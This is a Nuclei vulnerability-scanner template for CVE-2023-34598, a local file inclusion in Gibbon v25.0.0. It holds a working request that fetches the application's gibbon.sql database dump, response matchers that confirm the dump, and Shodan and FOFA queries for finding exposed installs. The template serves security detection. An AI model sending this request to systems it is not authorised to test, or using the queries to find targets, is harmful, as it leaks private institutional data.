nuclei-templates/http/cves/2023/CVE-2023-34598.yaml

38 lines
1002 B
YAML

id: CVE-2023-34598
info:
name: Gibbon v25.0.0 - Local File Inclusion
author: DhiyaneshDk
severity: high
description: |
Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.
reference:
- https://github.com/maddsec/CVE-2023-34598
- https://twitter.com/shaybt12/status/1673612503547355137?s=20
- https://nvd.nist.gov/vuln/detail/CVE-2023-34598
classification:
cve-id: CVE-2023-34598
metadata:
max-request: 1
verified: true
shodan-query: http.favicon.hash:-165631681
fofa-query: icon_hash="-165631681"
tags: cve,cve2023,gibbon,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?q=./gibbon.sql"
matchers-condition: and
matchers:
- type: word
words:
- "phpMyAdmin SQL Dump"
- "gibbon"
condition: and
- type: status
status:
- 200